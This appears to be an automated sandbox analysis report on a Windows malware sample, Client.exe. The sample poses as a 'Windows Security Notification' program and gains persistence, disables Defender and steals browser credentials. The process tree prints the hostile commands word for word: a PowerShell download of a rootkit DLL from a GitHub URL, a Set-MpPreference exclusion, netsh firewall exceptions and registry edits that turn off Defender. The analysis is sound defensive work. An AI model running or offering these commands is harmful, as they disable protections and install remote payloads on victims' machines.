Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
19-08-2024 00:54
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240802-en
General
-
Target
Client.exe
-
Size
34KB
-
MD5
de2ff0cf683f97d87c97a84a0bdeb49e
-
SHA1
52a3d2012d8dde1e131f4c8e060d193e2f1237cf
-
SHA256
62566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0
-
SHA512
56c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e
-
SSDEEP
768:QpNkDJkjKB41eZuT0dm9joyZwPhtbPn9BX3qJKhSdN38:kNkDNB41eZw9jonR/9N3qJKhsh8
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2608-1-0x0000000001300000-0x000000000130E000-memory.dmp disable_win_def behavioral1/files/0x000f000000013423-3.dat disable_win_def behavioral1/memory/2896-5-0x0000000000910000-0x000000000091E000-memory.dmp disable_win_def -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" $77-Windows Security Notification.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 3032 powershell.exe 6 3032 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2660 netsh.exe 2724 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe $77-Windows Security Notification.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe $77-Windows Security Notification.exe -
Executes dropped EXE 1 IoCs
pid Process 2896 $77-Windows Security Notification.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features $77-Windows Security Notification.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-Windows Security Notification.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe" $77-Windows Security Notification.exe Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe" $77-Windows Security Notification.exe -
pid Process 3032 powershell.exe 2360 powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-Windows Security Notification.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3032 powershell.exe 576 powershell.exe 2360 powershell.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe 2896 $77-Windows Security Notification.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe Token: 33 2896 $77-Windows Security Notification.exe Token: SeIncBasePriorityPrivilege 2896 $77-Windows Security Notification.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2608 wrote to memory of 2256 2608 Client.exe 32 PID 2608 wrote to memory of 2256 2608 Client.exe 32 PID 2608 wrote to memory of 2256 2608 Client.exe 32 PID 2608 wrote to memory of 2256 2608 Client.exe 32 PID 2672 wrote to memory of 2896 2672 explorer.exe 34 PID 2672 wrote to memory of 2896 2672 explorer.exe 34 PID 2672 wrote to memory of 2896 2672 explorer.exe 34 PID 2672 wrote to memory of 2896 2672 explorer.exe 34 PID 2896 wrote to memory of 2660 2896 $77-Windows Security Notification.exe 35 PID 2896 wrote to memory of 2660 2896 $77-Windows Security Notification.exe 35 PID 2896 wrote to memory of 2660 2896 $77-Windows Security Notification.exe 35 PID 2896 wrote to memory of 2660 2896 $77-Windows Security Notification.exe 35 PID 2896 wrote to memory of 2724 2896 $77-Windows Security Notification.exe 36 PID 2896 wrote to memory of 2724 2896 $77-Windows Security Notification.exe 36 PID 2896 wrote to memory of 2724 2896 $77-Windows Security Notification.exe 36 PID 2896 wrote to memory of 2724 2896 $77-Windows Security Notification.exe 36 PID 2896 wrote to memory of 600 2896 $77-Windows Security Notification.exe 39 PID 2896 wrote to memory of 600 2896 $77-Windows Security Notification.exe 39 PID 2896 wrote to memory of 600 2896 $77-Windows Security Notification.exe 39 PID 2896 wrote to memory of 600 2896 $77-Windows Security Notification.exe 39 PID 600 wrote to memory of 3032 600 cmd.exe 41 PID 600 wrote to memory of 3032 600 cmd.exe 41 PID 600 wrote to memory of 3032 600 cmd.exe 41 PID 600 wrote to memory of 3032 600 cmd.exe 41 PID 2896 wrote to memory of 2360 2896 $77-Windows Security Notification.exe 42 PID 2896 wrote to memory of 2360 2896 $77-Windows Security Notification.exe 42 PID 2896 wrote to memory of 2360 2896 $77-Windows Security Notification.exe 42 PID 2896 wrote to memory of 2360 2896 $77-Windows Security Notification.exe 42 PID 2896 wrote to memory of 576 2896 $77-Windows Security Notification.exe 44 PID 2896 wrote to memory of 576 2896 $77-Windows Security Notification.exe 44 PID 2896 wrote to memory of 576 2896 $77-Windows Security Notification.exe 44 PID 2896 wrote to memory of 576 2896 $77-Windows Security Notification.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\ProgramData\Windows Security\$77-Windows Security Notification.exe2⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\ProgramData\Windows Security\$77-Windows Security Notification.exe"C:\ProgramData\Windows Security\$77-Windows Security Notification.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\Windows Security\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5de2ff0cf683f97d87c97a84a0bdeb49e
SHA152a3d2012d8dde1e131f4c8e060d193e2f1237cf
SHA25662566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0
SHA51256c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e
-
Filesize
251B
MD5eb42fd6dc5814aaaad5ae381e4c64cae
SHA19fc6655c50b8543fcab600256d104c33bc37f6bb
SHA256ae65c56a9718326d6899262eea15044cf418b341472645098f68b6e3f0729068
SHA512e2d7e8853a29b4a55d4797b3e340631d14af83e0bff3f2521b56a2435b92dbc2f5d101dbd4f516d23f6b136c62d65f1a9bd47268e0f209108967b85e3b70b17a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50b8ce7d770eeada310efd638b7be4825
SHA153362105625022c73d719898ae2dcf878fb3b856
SHA256a484babcf4070a56a5d471ebe73dd90243d20a22e6a2f54040d0bc7e7100695d
SHA5127bae5e34bfa3ca020898f19dac4f2769460fdec1ff045ba235c3d5964cf6dbcd3426989d834cb4ad397b1ee1342a7207a7c284aaaa97d2c5cd8a9294fce97734